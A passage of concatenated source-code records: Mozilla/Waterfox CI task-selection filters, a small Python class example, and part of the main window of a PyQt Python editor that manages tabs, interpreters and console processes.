routes.append(\"notify.email.{}.on-failed\".format(owner))\n routes.append(\"notify.email.{}.on-exception\".format(owner))\n\n return target_tasks_labels\n\n\n@_target_task('try_tasks')\ndef target_tasks_try(full_task_graph, parameters):\n labels = _try_task_config(full_task_graph, parameters)\n\n if 'try:' in parameters['message'] or not labels:\n labels.extend(_try_option_syntax(full_task_graph, parameters))\n\n return labels\n\n\n@_target_task('default')\ndef target_tasks_default(full_task_graph, parameters):\n \"\"\"Target the tasks which have indicated they should be run on this project\n via the `run_on_projects` attributes.\"\"\"\n\n return [l for l, t in full_task_graph.tasks.iteritems()\n if standard_filter(t, parameters)]\n\n\n@_target_task('ash_tasks')\ndef target_tasks_ash(full_task_graph, parameters):\n \"\"\"Target tasks that only run on the ash branch.\"\"\"\n def filter(task):\n platform = task.attributes.get('build_platform')\n # Early return if platform is None\n if not platform:\n return False\n # Only on Linux platforms\n if 'linux' not in platform:\n return False\n # No random non-build jobs either. This is being purposely done as a\n # blacklist so newly-added jobs aren't missed by default.\n for p in ('nightly', 'haz', 'artifact', 'cov', 'add-on'):\n if p in platform:\n return False\n for k in ('toolchain', 'l10n', 'static-analysis'):\n if k in task.attributes['kind']:\n return False\n # and none of this linux64-asan/debug stuff\n if platform == 'linux64-asan' and task.attributes['build_type'] == 'debug':\n return False\n # no non-e10s tests\n if task.attributes.get('unittest_suite'):\n if not task.attributes.get('e10s'):\n return False\n # don't run talos on ash\n if task.attributes.get('unittest_suite') == 'talos':\n return False\n # don't upload symbols\n if task.attributes['kind'] == 'upload-symbols':\n return False\n return True\n return [l for l, t in full_task_graph.tasks.iteritems() if filter(t)]\n\n\n@_target_task('cedar_tasks')\ndef target_tasks_cedar(full_task_graph, parameters):\n \"\"\"Target tasks that only run on the cedar branch.\"\"\"\n def filter(task):\n platform = task.attributes.get('build_platform')\n # only select platforms\n if platform not in ('linux64', 'macosx64'):\n return False\n if task.attributes.get('unittest_suite'):\n if not (task.attributes['unittest_suite'].startswith('mochitest') or\n 'xpcshell' in task.attributes['unittest_suite']):\n return False\n return True\n return [l for l, t in full_task_graph.tasks.iteritems() if filter(t)]\n\n\n@_target_task('graphics_tasks')\ndef target_tasks_graphics(full_task_graph, parameters):\n \"\"\"In addition to doing the filtering by project that the 'default'\n filter does, also remove artifact builds because we have csets on\n the graphics branch that aren't on the candidate branches of artifact\n builds\"\"\"\n filtered_for_project = target_tasks_default(full_task_graph, parameters)\n\n def filter(task):\n if task.attributes['kind'] == 'artifact-build':\n return False\n return True\n return [l for l in filtered_for_project if filter(full_task_graph[l])]\n\n\n@_target_task('mochitest_valgrind')\ndef target_tasks_valgrind(full_task_graph, parameters):\n \"\"\"Target tasks that only run on the cedar branch.\"\"\"\n def filter(task):\n platform = task.attributes.get('test_platform', '').split('/')[0]\n if platform not in ['linux64']:\n return False\n\n if task.attributes.get('unittest_suite', '').startswith('mochitest') and \\\n task.attributes.get('unittest_flavor', 
'').startswith('valgrind-plain'):\n return True\n return False\n\n return [l for l, t in full_task_graph.tasks.iteritems() if filter(t)]\n\n\n@_target_task('nightly_fennec')\ndef target_tasks_nightly_fennec(full_task_graph, parameters):\n \"\"\"Select the set of tasks required for a nightly build of fennec. The\n nightly build process involves a pipeline of builds, signing,\n and, eventually, uploading the tasks to balrog.\"\"\"\n def filter(task):\n platform = task.attributes.get('build_platform')\n if platform in ('android-aarch64-nightly',\n 'android-api-16-nightly',\n 'android-api-16-old-id-nightly',\n 'android-nightly',\n 'android-x86-nightly',\n 'android-x86-old-id-nightly'):\n if not task.attributes.get('nightly', False):\n return False\n return filter_for_project(task, parameters)\n return [l for l, t in full_task_graph.tasks.iteritems() if filter(t)]\n\n\n@_target_task('nightly_linux')\ndef target_tasks_nightly_linux(full_task_graph, parameters):\n \"\"\"Select the set of tasks required for a nightly build of linux. The\n nightly build process involves a pipeline of builds, signing,\n and, eventually, uploading the tasks to balrog.\"\"\"\n def filter(task):\n platform = task.attributes.get('build_platform')\n if platform in ('linux64-nightly', 'linux-nightly'):\n return task.attributes.get('nightly', False)\n return [l for l, t in full_task_graph.tasks.iteritems() if filter(t)]\n\n\n@_target_task('mozilla_beta_tasks')\ndef target_tasks_mozilla_beta(full_task_graph, parameters):\n \"\"\"Select the set of tasks required for a promotable beta or release build\n of linux, plus android CI. The candidates build process involves a pipeline\n of builds and signing, but does not include beetmover or balrog jobs.\"\"\"\n\n def filter(task):\n if not standard_filter(task, parameters):\n return False\n platform = task.attributes.get('build_platform')\n if platform in (\n # On beta, Nightly builds are already PGOs\n 'linux-pgo', 'linux64-pgo',\n 'win32-pgo', 'win64-pgo',\n 'android-api-16-nightly', 'android-x86-nightly'\n ):\n return False\n\n if platform in (\n 'linux', 'linux64',\n 'macosx64',\n 'win32', 'win64',\n ):\n if task.attributes['build_type'] == 'opt' and \\\n task.attributes.get('unittest_suite') != 'talos':\n return False\n\n # skip l10n, beetmover, balrog\n if task.kind in [\n 'balrog',\n 'beetmover', 'beetmover-checksums', 'beetmover-l10n',\n 'beetmover-repackage', 'beetmover-repackage-signing',\n 'checksums-signing',\n 'nightly-l10n', 'nightly-l10n-signing',\n 'push-apk', 'push-apk-breakpoint',\n 'repackage-l10n',\n ]:\n return False\n\n # No l10n repacks per push. They may be triggered by kinds which depend\n # on l10n builds/repacks. For instance: \"repackage-signing\"\n if task.attributes.get('locale', '') != '':\n return False\n\n return True\n\n return [l for l, t in full_task_graph.tasks.iteritems() if filter(t)]\n\n\n@_target_task('mozilla_release_tasks')\ndef target_tasks_mozilla_release(full_task_graph, parameters):\n \"\"\"Select the set of tasks required for a promotable beta or release build\n of linux, plus android CI. The candidates build process involves a pipeline\n of builds and signing, but does not include beetmover or balrog jobs.\"\"\"\n return target_tasks_mozilla_beta(full_task_graph, parameters)\n\n\n@_target_task('candidates_fennec')\ndef target_tasks_candidates_fennec(full_task_graph, parameters):\n \"\"\"Select the set of tasks required for a candidates build of fennec. 
The\n nightly build process involves a pipeline of builds, signing,\n and, eventually, uploading the tasks to balrog.\"\"\"\n filtered_for_project = target_tasks_nightly_fennec(full_task_graph, parameters)\n\n def filter(task):\n if task.kind not in ['balrog']:\n return task.attributes.get('nightly', False)\n\n return [l for l in filtered_for_project if filter(full_task_graph[l])]\n\n\n@_target_task('pine_tasks')\ndef target_tasks_pine(full_task_graph, parameters):\n \"\"\"Bug 1339179 - no mobile automation needed on pine\"\"\"\n def filter(task):\n platform = task.attributes.get('build_platform')\n # disable mobile jobs\n if str(platform).startswith('android'):\n return False\n # disable asan\n if platform == 'linux64-asan':\n return False\n # disable non-pine and nightly tasks\n if standard_filter(task, parameters):\n return True\n return [l for l, t in full_task_graph.tasks.iteritems() if filter(t)]\n\n\n@_target_task('nightly_macosx')\ndef target_tasks_nightly_macosx(full_task_graph, parameters):\n \"\"\"Select the set of tasks required for a nightly build of macosx. The\n nightly build process involves a pipeline of builds, signing,\n and, eventually, uploading the tasks to balrog.\"\"\"\n def filter(task):\n platform = task.attributes.get('build_platform')\n if platform in ('macosx64-nightly', ):\n return task.attributes.get('nightly', False)\n return [l for l, t in full_task_graph.tasks.iteritems() if filter(t)]\n\n\n@_target_task('nightly_win')\ndef target_tasks_nightly_win(full_task_graph, parameters):\n \"\"\"Select the set of tasks required for a nightly build of win32 and win64.\n The nightly build process involves a pipeline of builds, signing,\n and, eventually, uploading the tasks to balrog.\"\"\"\n def filter(task):\n platform = task.attributes.get('build_platform')\n if not filter_for_project(task, parameters):\n return False\n if platform in ('win32-nightly', 'win64-nightly'):\n return task.attributes.get('nightly', False)\n return [l for l, t in full_task_graph.tasks.iteritems() if filter(t)]\n\n\n@_target_task('nightly_desktop')\ndef target_tasks_nightly_desktop(full_task_graph, parameters):\n \"\"\"Select the set of tasks required for a nightly build of linux, mac,\n windows.\"\"\"\n # Avoid duplicate tasks.\n return list(\n set(target_tasks_nightly_win(full_task_graph, parameters))\n | set(target_tasks_nightly_macosx(full_task_graph, parameters))\n | set(target_tasks_nightly_linux(full_task_graph, parameters))\n )\n\n\n# Opt DMD builds should only run nightly\n@_target_task('nightly_dmd')\ndef target_tasks_dmd(full_task_graph, parameters):\n \"\"\"Target DMD that run nightly on the m-c branch.\"\"\"\n def filter(task):\n platform = task.attributes.get('build_platform', '')\n return platform.endswith('-dmd')\n return [l for l, t in full_task_graph.tasks.iteritems() if filter(t)]\n","repo_name":"WaterfoxCo/Waterfox-Classic","sub_path":"taskcluster/taskgraph/target_tasks.py","file_name":"target_tasks.py","file_ext":"py","file_size_in_byte":14894,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"71"} +{"seq_id":"6771065367","text":"class point():\n # now we need to make a constructor\n # all the functions or methods that operate on objs take first arguments as self whic represents\n # the object in Question\n # basically self refernces the obj we are dealing with\n def __init__(self, input1, input2):\n self.x = input1\n self.y = input2\n\n\np = point(2, 
9)\nprint(p.x)\nprint(p.y)\n","repo_name":"Samarjeet09/WebDev","sub_path":"3.PYTHON/13)class.py","file_name":"13)class.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"2279491763","text":"import urllib.parse\n\n# Import Qt modules\nfrom PyQt4 import QtCore, QtGui\n\n# Import application modules\nfrom fiddle import __version__\nfrom fiddle.views.MainWindow import Ui_MainWindow\nfrom fiddle.controllers.FiddleTabWidget import FiddleTabWidget, FiddleTabFile\nfrom fiddle.controllers.PyConsole import PyConsoleTextBrowser\nfrom fiddle.controllers.ManageInterpretersDialog import ManageInterpretersDialog\nfrom fiddle.config import *\nfrom fiddle.helpers.builtins import *\n\n# Set up the logger\nlogger = logging.getLogger(__name__)\n\n\nclass MainWindow(QtGui.QMainWindow):\n def __init__(self, app=None, files=None):\n super(MainWindow, self).__init__()\n\n self.app = app\n\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n\n self.setWindowTitle(WINDOW_TITLE)\n\n # Initialize actions\n self.init_actions()\n\n # Initialize statusbar\n self.lbl_pyversion = None\n self.lbl_current_position = None\n self.lbl_encoding = None\n self.init_statusbar()\n\n # Hide the help pane\n self.ui.helpPane.hide()\n\n # Hide the Find/Replace frame\n self.ui.findPane.hide()\n\n # Initialize Find/Replace\n self.init_find_replace_events()\n\n # Initialize interpreters\n self.current_interpreter = CONSOLE_PYTHON['path']\n self.current_interpreter_dir = CONSOLE_PYTHON_DIR\n self.interpreters = []\n self.init_interpreters()\n\n # Initialize Python console\n self.pyconsole_output = PyConsoleTextBrowser(self)\n self.ui.pyConsoleLayout.insertWidget(0, self.pyconsole_output)\n self.pyconsole_output.anchorClicked.connect(self.load_anchor)\n self.pyconsole_process = None\n self.help_process = None\n self.pyconsole_pyversion = None # stores a tuple of the system Python's version\n self.start_pyconsole_process()\n self.start_pyconsole_help()\n\n # Console text formats\n self.base_format = None\n self.error_format = None\n self.info_format = None\n self.init_console_text_formats()\n\n # Initialize run script console\n self.runscript_console = PyConsoleTextBrowser(self)\n self.ui.runScriptLayout.insertWidget(1, self.runscript_console)\n self.runscript_console.anchorClicked.connect(self.load_anchor)\n self.runscript_process = None\n self.runscript_tab = None\n\n # Initialize the search providers\n self.search_url = ''\n self.init_search_providers()\n\n # Initialize the TabWidget\n self.documents_tabWidget = FiddleTabWidget(self)\n self.ui.centralLayout.insertWidget(0, self.documents_tabWidget)\n self.documents_tabWidget.tabCloseRequested.connect(self.close_tab)\n self.documents_tabWidget.currentChanged.connect(self.handle_tab_change)\n\n # Initialize recent files\n self.recent_files = []\n self.init_open_recent()\n\n # Load any files/dirs passed on the command line\n self.init_load_files(files)\n\n def closeEvent(self, event):\n event.ignore()\n if self.close_all_tabs():\n event.accept()\n self.terminate_pyconsole_process(timeout=1000)\n self.terminate_current_script(timeout=1000)\n self.terminate_pyconsole_help(timeout=1000)\n\n def stop(self):\n pass\n\n def init_load_files(self, paths):\n \"\"\"\n Given a list of paths, open all the files found. 
If a path is a directory then open all the files in that\n directory.\n\n :param list paths:\n :return:\n \"\"\"\n if paths is not None and len(paths) > 0:\n # Open all the files\n for path in paths:\n if os.path.isfile(path):\n self.open_filepath(path)\n elif os.path.isdir(path):\n for item in os.listdir(path):\n ipath = os.path.join(path, item)\n if os.path.isfile(ipath):\n self.open_filepath(ipath)\n else:\n # Add a blank file\n self.new_file()\n\n def init_actions(self):\n # File actions\n self.ui.actionNew.triggered.connect(self.new_file)\n self.ui.actionOpen.triggered.connect(self.open_file)\n self.ui.actionSave_File.triggered.connect(self.save_file)\n self.ui.actionSave_File_As.triggered.connect(self.save_file_as)\n self.ui.actionPrint.triggered.connect(self.print_file)\n self.ui.actionClose_Tab.triggered.connect(self.close_current_tab)\n self.ui.actionClose_All_Tabs.triggered.connect(self.close_all_tabs)\n self.ui.actionExit.triggered.connect(self.exit_app)\n\n # Edit actions\n self.ui.actionCut.triggered.connect(self.edit_cut)\n self.ui.actionCopy.triggered.connect(self.edit_copy)\n self.ui.actionPaste.triggered.connect(self.edit_paste)\n self.ui.actionSelect_All.triggered.connect(self.edit_select_all)\n self.ui.actionFind.triggered.connect(self.find_in_file)\n self.ui.actionFind_and_Replace.triggered.connect(self.replace_in_file)\n\n # View actions\n self.ui.actionZoom_In.triggered.connect(self.zoom_in_text)\n self.ui.actionZoom_Out.triggered.connect(self.zoom_out_text)\n self.ui.actionWord_Wrap.triggered.connect(self.set_editors_wordwrap)\n self.ui.actionShow_Whitespace.triggered.connect(self.set_editors_whitespace)\n self.ui.actionShow_End_of_Line.triggered.connect(self.set_editors_eolchars)\n\n # Code actions\n self.ui.actionClean_Code.triggered.connect(self.clean_current_editor)\n self.ui.actionCheck_Code.triggered.connect(self.check_current_editor)\n\n # Console actions\n self.ui.actionShow_Console.triggered.connect(self.toggle_console)\n self.ui.actionRestart_Console.triggered.connect(self.restart_pyconsole_process)\n self.ui.actionHalt_Python_Console.triggered.connect(self.terminate_pyconsole_process)\n self.ui.actionRun_Current_Script.triggered.connect(self.run_current_script)\n self.ui.actionHalt_Current_Script.triggered.connect(self.terminate_current_script)\n\n # Help actions\n self.ui.actionShow_Help_Pane.triggered.connect(self.toggle_help_pane)\n self.ui.actionAbout_fIDDEL.triggered.connect(self.show_about_fiddle)\n #self.ui.actionFIDDLE_Help.triggered.connect() # TODO: Create\n\n def init_search_providers(self):\n ag = QtGui.QActionGroup(self)\n ag.setExclusive(True)\n for item in HELP_WEB_SEARCH_SOURCES:\n a = QtGui.QAction(self)\n a.setData(item)\n a.setText(item['name'])\n a.setCheckable(True)\n a.triggered.connect(self.set_search_provider)\n ag.addAction(a)\n self.ui.menuSearch_Provider.addAction(a)\n if item['name'] == HELP_WEB_SEARCH_SOURCES[0]['name']:\n a.trigger()\n\n def init_interpreters(self):\n self.ui.menuPython_Interpreter.clear()\n # Add the default actions\n a_manage = QtGui.QAction(self)\n a_manage.setText(self.tr('Manage Interpreters'))\n a_manage.triggered.connect(self.show_manage_interpreters)\n self.ui.menuPython_Interpreter.addAction(a_manage)\n self.ui.menuPython_Interpreter.addSeparator()\n # Add the available interpreters\n ag = QtGui.QActionGroup(self)\n ag.setExclusive(True)\n # Set default interpreter\n a = QtGui.QAction(self)\n a.setData(CONSOLE_PYTHON)\n a.setText(self.tr('(Default) {0}'.format(CONSOLE_PYTHON['path'])))\n 
a.setCheckable(True)\n a.setChecked(True)\n a.triggered.connect(self.set_current_interpreter)\n ag.addAction(a)\n self.ui.menuPython_Interpreter.addAction(a)\n # Add additional interpreters\n for item in CONSOLE_PYTHON_INTERPRETERS:\n a = QtGui.QAction(self)\n a.setData(item)\n if item['virtualenv']:\n a.setText(self._elide_filepath(os.path.dirname(item['path']), threshold=50, margin=10))\n else:\n if PLATFORM == 'win32':\n a.setText(os.path.dirname(item['path']))\n else:\n a.setText(item['path'])\n a.setCheckable(True)\n a.triggered.connect(self.set_current_interpreter)\n ag.addAction(a)\n self.ui.menuPython_Interpreter.addAction(a)\n\n def init_open_recent(self):\n if os.path.exists('.recent'):\n with open('.recent') as fp:\n self.recent_files = fp.readlines()\n self.create_recent_files_menu()\n\n def init_console_text_formats(self):\n # Base format (defined in Qt Designer)\n self.base_format = self.pyconsole_output.currentCharFormat()\n self.base_format.setForeground(QtGui.QColor(CONSOLE_COLOR_BASE))\n\n # Error format for data on stderr\n self.error_format = QtGui.QTextCharFormat(self.base_format)\n self.error_format.setForeground(QtGui.QColor(CONSOLE_COLOR_ERROR))\n\n # Info format for data\n self.info_format = QtGui.QTextCharFormat(self.base_format)\n self.info_format.setForeground(QtGui.QColor(CONSOLE_COLOR_INFO))\n\n def init_statusbar(self):\n # Statusbar\n # you can't add widgets to status bar in Qt Designer, so do it here\n self.lbl_pyversion = QtGui.QLabel()\n self.lbl_pyversion.setMargin(5)\n self.ui.statusbar.addPermanentWidget(self.lbl_pyversion)\n self.lbl_pyversion.setText(\"\")\n\n self.lbl_encoding = QtGui.QLabel()\n self.lbl_encoding.setMargin(5)\n self.lbl_encoding.setToolTip(self.tr('File encoding'))\n self.ui.statusbar.insertPermanentWidget(0, self.lbl_encoding)\n self.lbl_encoding.setText('UTF-8')\n\n self.lbl_current_position = QtGui.QLabel()\n self.lbl_current_position.setMargin(5)\n self.lbl_current_position.setToolTip(self.tr('Line no.:Column no.'))\n self.ui.statusbar.insertPermanentWidget(0, self.lbl_current_position)\n self.lbl_current_position.setText('0:0')\n\n def init_find_replace_events(self):\n # http://stackoverflow.com/questions/23076698/pyside-select-all-text-when-qlineedit-gets-focus\n # Focusing on the widgets selects all the text (e.g. 
tabbing in)\n self.ui.find_text_lineEdit.focusInEvent = lambda _: self.ui.find_text_lineEdit.selectAll()\n self.ui.replace_text_lineEdit.focusInEvent = lambda _: self.ui.replace_text_lineEdit.selectAll()\n\n # Clicking on the widgets select all the text\n self.ui.find_text_lineEdit.mousePressEvent = lambda _: self.ui.find_text_lineEdit.selectAll()\n self.ui.replace_text_lineEdit.mousePressEvent = lambda _: self.ui.replace_text_lineEdit.selectAll()\n\n def set_current_interpreter(self):\n action = self.sender()\n item = action.data()\n if os.path.exists(item['path']):\n self.current_interpreter = os.path.normpath(item['path'])\n self.current_interpreter_dir = os.path.dirname(self.current_interpreter)\n self.restart_pyconsole_process()\n self.restart_pyconsole_help()\n idx = self.documents_tabWidget.currentIndex()\n self.handle_tab_change(idx)\n else:\n self.ui.statusbar.showMessage(self.tr('No Python executable at {0}').format(item['path']), 5000)\n\n def start_pyconsole_process(self):\n if self.pyconsole_process is None:\n # Create a shell process\n self.pyconsole_process = QtCore.QProcess(self.app)\n self.pyconsole_process.setWorkingDirectory(self.current_interpreter_dir)\n self.pyconsole_process.readyReadStandardError.connect(self.process_console_stderr)\n self.pyconsole_process.readyReadStandardOutput.connect(self.process_console_stdout)\n self.pyconsole_process.finished.connect(self.process_console_finished)\n self.pyconsole_output.process = self.pyconsole_process\n else:\n self.terminate_pyconsole_process()\n # Clear any version information\n self.pyconsole_pyversion = None\n # Start the interactive console\n self.pyconsole_process.start(self.current_interpreter, ['-i']) # -i makes sure InteractiveConsole is started\n\n def restart_pyconsole_process(self):\n self.app.setOverrideCursor(QtCore.Qt.WaitCursor)\n self.terminate_pyconsole_process()\n self.pyconsole_output.clear()\n self.start_pyconsole_process()\n self.app.restoreOverrideCursor()\n\n def terminate_pyconsole_process(self, timeout=5000):\n if self.pyconsole_process is not None and self.pyconsole_process.state() > 0:\n self.print_data_to_pyconsole('\\n', self.info_format)\n self.print_data_to_pyconsole(self.tr('Python console is terminating...'), self.info_format)\n self.pyconsole_output.repaint() # Force message to show\n self.pyconsole_process.write('exit()\\n')\n self.pyconsole_process.close()\n if PLATFORM == 'win32':\n self.pyconsole_process.kill()\n else:\n self.pyconsole_process.terminate()\n if not self.pyconsole_process.waitForFinished(timeout):\n self.pyconsole_process.kill()\n\n def start_pyconsole_help(self):\n if self.help_process is None:\n # Create a shell process\n self.help_process = QtCore.QProcess(self.app)\n self.help_process.setWorkingDirectory(self.current_interpreter_dir)\n self.help_process.readyReadStandardError.connect(self.process_help_stderr)\n self.help_process.readyReadStandardOutput.connect(self.process_help_stdout)\n self.help_process.finished.connect(self.process_help_finished)\n else:\n self.terminate_pyconsole_help()\n # Start the pydoc help server\n self.help_process.start(self.current_interpreter, ['-m', 'pydoc', '-p', str(CONSOLE_HELP_PORT)])\n\n def restart_pyconsole_help(self):\n self.app.setOverrideCursor(QtCore.Qt.WaitCursor)\n self.terminate_pyconsole_help()\n self.runscript_console.clear()\n self.start_pyconsole_help()\n self.app.restoreOverrideCursor()\n\n def terminate_pyconsole_help(self, timeout=5000):\n if self.help_process is not None and self.help_process.state() > 0:\n 
self.print_data_to_runconsole('\\n', self.info_format)\n self.print_data_to_runconsole(self.tr('Python console is terminating...'), self.info_format)\n self.runscript_console.repaint() # Force message to show\n self.help_process.close()\n if PLATFORM == 'win32':\n self.help_process.kill()\n else:\n self.help_process.terminate()\n if not self.help_process.waitForFinished(timeout):\n self.help_process.kill()\n\n def run_current_script(self):\n if self.runscript_process is None:\n # Create a shell process\n self.runscript_process = QtCore.QProcess(self.app)\n self.runscript_process.setWorkingDirectory(self.runscript_tab.basepath)\n self.runscript_process.readyReadStandardError.connect(self.process_runscript_stderr)\n self.runscript_process.readyReadStandardOutput.connect(self.process_runscript_stdout)\n self.runscript_process.finished.connect(self.process_runscript_finished)\n self.runscript_console.process = self.runscript_process\n else:\n self.terminate_current_script()\n # Show the run tab\n self.ui.console_tabWidget.show()\n self.ui.console_tabWidget.setCurrentIndex(1)\n # Clear the output\n self.runscript_console.clear()\n # Run the script in the process\n if not os.path.isfile(self.runscript_tab.filepath) or not self.runscript_tab.saved:\n self.runscript_tab.save()\n self.set_current_run_command(self.runscript_tab) # Update the command to the saved location\n command = self.ui.runScript_command.text()\n self.runscript_process.start(command)\n\n def terminate_current_script(self, timeout=2000):\n if self.runscript_process is not None and self.runscript_process.state() > 0:\n self.print_data_to_runconsole('\\n', self.info_format)\n self.print_data_to_runconsole(self.tr('Script is terminating...'), self.info_format)\n self.runscript_console.repaint() # Force message to show\n self.app.setOverrideCursor(QtCore.Qt.WaitCursor)\n self.runscript_process.close()\n if PLATFORM == 'win32':\n self.runscript_process.kill()\n else:\n self.runscript_process.terminate()\n if not self.runscript_process.waitForFinished(timeout):\n self.runscript_process.kill()\n self.app.restoreOverrideCursor()\n\n def create_tab(self, filepath=None):\n tab = FiddleTabFile(parent=self.documents_tabWidget, filepath=filepath)\n tab.editor_changed.connect(self.update_tab_title)\n tab.cursor_changed.connect(self.update_cursor_position)\n tab.find_wrapped.connect(self.handle_find_wrapped)\n return tab\n\n def new_file(self):\n tab = self.create_tab()\n tabname = tab.filename if tab.saved else tab.filename + ' *'\n idx = self.documents_tabWidget.addTab(tab, tabname)\n self.documents_tabWidget.setCurrentIndex(idx)\n if self.ui.actionWord_Wrap.isChecked():\n tab.editor.wordwrap =True\n if self.ui.actionShow_End_of_Line.isChecked():\n tab.editor.eolchars = True\n if self.ui.actionShow_Whitespace.isChecked():\n tab.editor.whitespace = True\n\n def open_file(self):\n tab = self.documents_tabWidget.currentWidget()\n filepath = QtGui.QFileDialog.getOpenFileName(None,\n None,\n os.path.expanduser('~') if tab is None else tab.basepath,\n ';;'.join(FILE_TYPES))\n if filepath != '':\n self.open_filepath(filepath)\n self.update_recent_files(filepath)\n\n def open_filepath(self, filepath):\n if not os.path.exists(filepath):\n self.ui.statusbar.showMessage(self.tr('No file at {0}').format(filepath), 5000)\n return None\n\n if filepath is not '' and not None:\n tab = self.create_tab(filepath)\n if os.path.normcase(CONSOLE_PYTHON_DIR) in os.path.normcase(filepath):\n # Give users a hint they may be editing a system file by changing 
background color\n tab.editor.lexer.setPaper(QtGui.QColor(EDITOR_CARET_LINE_COLOR))\n idx = self.documents_tabWidget.addTab(tab, tab.filename)\n self.documents_tabWidget.setCurrentIndex(idx)\n self.documents_tabWidget.setTabToolTip(idx, filepath)\n if self.ui.actionWord_Wrap.isChecked():\n tab.editor.wordwrap =True\n if self.ui.actionShow_End_of_Line.isChecked():\n tab.editor.eolchars = True\n if self.ui.actionShow_Whitespace.isChecked():\n tab.editor.whitespace = True\n return tab\n else:\n return None\n\n def open_recent_filepath(self):\n action = self.sender()\n if action:\n self.open_filepath(action.data())\n\n def update_recent_files(self, filepath):\n \"\"\"\n Save file path to recent files, truncating to 10 files and removing duplicates.\n\n :param str filepath:\n :return:\n \"\"\"\n try:\n self.recent_files.append(filepath)\n except AttributeError:\n self.recent_files = []\n self.recent_files.append(filepath)\n # Remove duplicates\n seen = []\n filtered = []\n for item in self.recent_files:\n if item in seen:\n continue\n seen.append(item)\n filtered.append(item)\n with open('.recent', 'w') as fp:\n if len(filtered) > 10:\n fp.write('\\n'.join(filtered[-10:]))\n else:\n fp.write('\\n'.join(filtered))\n self.create_recent_files_menu()\n\n def create_recent_files_menu(self):\n self.ui.menuOpen_Recent.clear()\n for filepath in reversed(self.recent_files):\n sfp = filepath.strip()\n if sfp != '':\n a = QtGui.QAction(self.ui.menuOpen_Recent)\n a.setText(self._elide_filepath(sfp, threshold=50, margin=10))\n a.setData(sfp)\n a.triggered.connect(self.open_recent_filepath)\n self.ui.menuOpen_Recent.addAction(a)\n\n def save_file(self):\n idx = self.documents_tabWidget.currentIndex()\n tab = self.documents_tabWidget.widget(idx)\n tab.save()\n self.documents_tabWidget.setTabToolTip(idx, tab.filepath)\n self.handle_tab_change(idx)\n\n def save_file_as(self):\n idx = self.documents_tabWidget.currentIndex()\n tab = self.documents_tabWidget.widget(idx)\n tab.save_as()\n self.documents_tabWidget.setTabToolTip(idx, tab.filepath)\n self.handle_tab_change(idx)\n\n def print_file(self):\n pass\n\n def exit_app(self):\n self.close()\n\n def edit_cut(self):\n try:\n cw = self.app.focusWidget()\n cw.cut()\n except AttributeError:\n pass\n\n def edit_copy(self):\n try:\n cw = self.app.focusWidget()\n cw.copy()\n except AttributeError:\n pass\n\n def edit_paste(self):\n try:\n cw = self.app.focusWidget()\n cw.paste()\n except AttributeError:\n pass\n\n def edit_select_all(self):\n try:\n cw = self.app.focusWidget()\n cw.selectAll()\n except AttributeError:\n pass\n\n def close_current_tab(self):\n idx = self.documents_tabWidget.currentIndex()\n return self.close_tab(idx)\n\n def close_all_tabs(self):\n for i in range(self.documents_tabWidget.count()):\n if not self.close_tab(0):\n return False\n return True\n\n def close_tab(self, idx):\n # removing the tab doesn't get the widget, so we need to get that first...\n widget = self.documents_tabWidget.widget(idx)\n # needs saving?\n if not widget.saved and widget.basepath is not None:\n if not self._save_tab_dialog(widget):\n # User canceled close action\n return False\n # remove it\n self.documents_tabWidget.removeTab(idx)\n # ...then delete it\n widget.deleteLater()\n return True\n\n def zoom_in_text(self):\n try:\n cw = self.app.focusWidget()\n if isinstance(cw, QtGui.QAbstractScrollArea):\n cw.zoomIn(1)\n except AttributeError:\n pass\n\n def zoom_out_text(self):\n try:\n cw = self.app.focusWidget()\n if isinstance(cw, QtGui.QAbstractScrollArea):\n 
cw.zoomOut(1)\n except AttributeError:\n pass\n\n def set_editors_wordwrap(self, state):\n \"\"\"\n Set the display of the word wrap in all the editors.\n\n :param bool state:\n :return:\n\n See QsiScinitilla.setWrapMode()\n \"\"\"\n for i in range(self.documents_tabWidget.count()):\n tab = self.documents_tabWidget.widget(i)\n tab.editor.wordwrap = state\n\n def set_editors_whitespace(self, state):\n \"\"\"\n Set the display of the whitespace characters in all the editors.\n\n :param bool state:\n :return:\n\n See QsiScinitilla.setEolVisibility()\n \"\"\"\n for i in range(self.documents_tabWidget.count()):\n tab = self.documents_tabWidget.widget(i)\n tab.editor.whitespace = state\n\n def set_editors_eolchars(self, state):\n \"\"\"\n Set the display of the end-of-line characters in all the editors\n\n :param bool state:\n :return:\n\n See QsiScinitilla.setWhitespaceVisibility()\n \"\"\"\n for i in range(self.documents_tabWidget.count()):\n tab = self.documents_tabWidget.widget(i)\n tab.editor.eolchars = state\n\n def clean_current_editor(self):\n \"\"\"\n Run the `clean_code` function in the currenly displayed editor widget.\n\n :return:\n \"\"\"\n self.app.setOverrideCursor(QtCore.Qt.WaitCursor)\n tab = self.documents_tabWidget.currentWidget()\n tab.editor.clean_code()\n self.app.restoreOverrideCursor()\n\n def check_current_editor(self):\n \"\"\"\n Run the `check_code` function in the currently displayed editor widget.\n\n :return:\n \"\"\"\n self.app.setOverrideCursor(QtCore.Qt.WaitCursor)\n tab = self.documents_tabWidget.currentWidget()\n tab.editor.check_code(tab.filepath)\n self.app.restoreOverrideCursor()\n\n def toggle_help_pane(self):\n if self.ui.helpBrowser.url().path() == 'blank':\n src = QtCore.QUrl('http://{0}:{1}/'.format(CONSOLE_HOST, CONSOLE_HELP_PORT))\n self.ui.helpBrowser.setUrl(src)\n if self.ui.helpPane.isVisible():\n self.ui.helpPane.hide()\n else:\n self.ui.helpPane.show()\n self.ui.helpSearch.selectAll()\n self.ui.helpSearch.setFocus()\n\n def toggle_console(self):\n if self.ui.consolePane.isHidden():\n self.ui.consolePane.show()\n else:\n self.ui.consolePane.hide()\n\n def set_search_provider(self):\n action = self.sender()\n data = action.data()\n self.search_url = data['query_tmpl']\n self.ui.searchProvider_label.setText(data['name'])\n\n def show_about_fiddle(self):\n message_box = QtGui.QMessageBox(self)\n message_box.setWindowTitle(self.tr('About fIDDLE'))\n message_box.setIconPixmap(QtGui.QPixmap(\":/logos/logos/fiddle_logo_64.png\"))\n message_box.setText('Version {0}'.format(__version__))\n message_box.setInformativeText(ABOUT_FIDDLE)\n ok_btn = message_box.addButton(QtGui.QMessageBox.Ok)\n message_box.setDefaultButton(ok_btn)\n message_box.exec_()\n\n def show_manage_interpreters(self):\n \"\"\"\n Display the Manage Interpreters dialog and save any changes if the Save button in 